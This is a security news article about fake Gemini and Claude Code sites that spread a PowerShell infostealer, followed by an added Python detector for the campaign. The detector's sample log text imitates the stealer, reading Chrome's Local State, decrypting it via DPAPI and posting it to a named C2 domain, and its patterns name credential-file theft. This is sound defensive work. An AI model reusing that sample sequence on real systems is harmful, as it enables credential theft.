Fake Gemini and Claude Code Sites Spread Infostealers Through SEO Poisoning

Infosecurity Magazine
May 22, 2026

Why It Matters

The attack compromises sensitive developer and corporate credentials, exposing enterprises to data theft and further ransomware or espionage threats. It highlights the growing risk of AI‑tool supply‑chain attacks that can bypass traditional security controls.

Key Takeaways

  • Fake Gemini and Claude Code sites use SEO poisoning to outrank the legitimate pages
  • A PowerShell‑run, memory‑resident infostealer steals browser and collaboration‑tool credentials
  • The campaign targets US and UK developers, focusing on enterprise workstations
  • Exfiltrated data is sent to the C2 domains events.msft23.com and events.ms709.com
  • The attack enables remote code execution, paving the way for deeper intrusion

Pulse Analysis

The rapid adoption of AI‑assisted development tools such as Google Gemini’s CLI and Anthropic’s Claude Code has created a lucrative lure for cybercriminals. By registering look‑alike domains and employing SEO‑poisoning techniques, threat actors push malicious pages to the top of search results, tricking developers into downloading counterfeit installers. This campaign, first reported in March 2026, demonstrates how attackers exploit the trust placed in official documentation to gain a foothold on corporate workstations, especially in the United States and United Kingdom where the domains are geographically tailored.

The payload delivered through the fake installers is a memory‑resident infostealer written in PowerShell. Once executed, it harvests credentials from Chromium‑based browsers, Firefox, and a suite of collaboration apps—including Slack, Microsoft Teams, Discord, and Zoom—by extracting local‑state files and DPAPI‑protected keys. It also siphons VPN configurations, cloud‑storage tokens, and cryptocurrency wallet data before encrypting the dump and sending it to command‑and‑control servers at events.msft23.com or events.ms709.com. The ability to run arbitrary remote code gives the adversary a direct path to deeper, hands‑on‑keyboard intrusion.

Enterprises can mitigate this threat by enforcing strict download policies, validating URLs against known vendor domains, and monitoring PowerShell activity for anomalous network connections. Endpoint detection platforms should flag in‑memory PowerShell scripts that attempt to read browser or application state files, while threat‑intel feeds can help block the identified C2 domains. As AI development tools become integral to software pipelines, the security community must treat their distribution channels as critical attack surfaces, ensuring that supply‑chain hygiene keeps up with the accelerating adoption of AI. Regular phishing simulations also reinforce user awareness of fake AI tool pages.
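The controls described above, as an added example that is not part of the article or of any vendor's tooling: a small Python detector that (1) validates download URLs against an allowlist of vendor hosts, (2) scans PowerShell script‑block log text for reads of browser or collaboration‑app state files, DPAPI unprotect calls and references to the two C2 domains the article names, and (3) flags PowerShell processes connecting to those C2 domains or to hosts outside the allowlist. The allowlist, the file‑path patterns and the sample script blocks and network events are constructed assumptions for illustration; only the C2 domains come from the article.

```python
"""Added example (not from the article): applying the listed mitigations
to constructed sample telemetry. Paths and allowlist are assumptions."""
import re
from urllib.parse import urlparse

# Assumption: an organisation-maintained allowlist of vendor download hosts.
APPROVED_DOWNLOAD_HOSTS = {"github.com", "anthropic.com", "google.com"}

# The two command-and-control domains named in the article.
KNOWN_C2_DOMAINS = {"events.msft23.com", "events.ms709.com"}

# Artefacts the article says the stealer reads (paths are typical, assumed locations).
SENSITIVE_FILE_PATTERNS = [
    re.compile(r"\\User Data\\Local State", re.IGNORECASE),          # Chromium Local State
    re.compile(r"\\Mozilla\\Firefox\\Profiles\\", re.IGNORECASE),    # Firefox profiles
    re.compile(r"\\AppData\\Roaming\\(Slack|Discord|Zoom)\\", re.IGNORECASE),
    re.compile(r"\\Microsoft\\Teams\\", re.IGNORECASE),
]
# DPAPI unprotect calls as they appear in PowerShell / Win32 usage.
DPAPI_PATTERN = re.compile(r"ProtectedData\]::Unprotect|CryptUnprotectData", re.IGNORECASE)


def host_matches(host, domains):
    """True if host equals one of the domains or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def is_approved_download_url(url):
    """Download-policy check: only https URLs on approved vendor hosts pass."""
    parts = urlparse(url)
    if parts.scheme != "https" or not parts.hostname:
        return False
    return host_matches(parts.hostname, APPROVED_DOWNLOAD_HOSTS)


def analyze_script_block(text):
    """Return the reasons a logged PowerShell script block looks like a credential stealer."""
    reasons = []
    if any(p.search(text) for p in SENSITIVE_FILE_PATTERNS):
        reasons.append("reads browser/collaboration app state files")
    if DPAPI_PATTERN.search(text):
        reasons.append("calls DPAPI unprotect")
    lowered = text.lower()
    for domain in sorted(KNOWN_C2_DOMAINS):
        if domain in lowered:
            reasons.append(f"references known C2 domain {domain}")
    return reasons


def analyze_network_events(events):
    """events: dicts with 'process' and 'dest_host'. Returns (severity, message) alerts."""
    alerts = []
    for ev in events:
        proc = ev["process"].lower()
        dest = ev["dest_host"]
        if host_matches(dest, KNOWN_C2_DOMAINS):
            alerts.append(("high", f"{ev['process']} connected to known C2 {dest}"))
        elif proc in ("powershell.exe", "pwsh.exe") and not host_matches(dest, APPROVED_DOWNLOAD_HOSTS):
            alerts.append(("medium", f"{ev['process']} connected to unapproved host {dest}"))
    return alerts


# Constructed sample script-block log text mimicking the described behaviour (not real malware).
SAMPLE_SCRIPT_BLOCK = r'''
$ls = Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State"
$key = [System.Security.Cryptography.ProtectedData]::Unprotect($enc, $null, 'CurrentUser')
Invoke-WebRequest -Uri "https://events.msft23.com/upload" -Method Post -Body $blob
'''
BENIGN_SCRIPT_BLOCK = r'''
Get-ChildItem "$env:USERPROFILE\Documents" | Measure-Object
'''
# Constructed sample network events (process name, destination host).
SAMPLE_NETWORK_EVENTS = [
    {"process": "powershell.exe", "dest_host": "events.ms709.com"},
    {"process": "chrome.exe", "dest_host": "github.com"},
    {"process": "pwsh.exe", "dest_host": "updates.example.internal"},
]

if __name__ == "__main__":
    print(is_approved_download_url("https://github.com/example/installer"))
    print(is_approved_download_url("https://github.com.evil.example/installer"))
    print(analyze_script_block(SAMPLE_SCRIPT_BLOCK))
    print(analyze_script_block(BENIGN_SCRIPT_BLOCK))
    for severity, msg in analyze_network_events(SAMPLE_NETWORK_EVENTS):
        print(severity, msg)
```

In production the script‑block text would come from PowerShell Script Block Logging (Event ID 4104) and the network events from EDR or Sysmon telemetry; the suffix check in `host_matches` is what stops look‑alike hosts such as `github.com.evil.example` from passing the allowlist.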
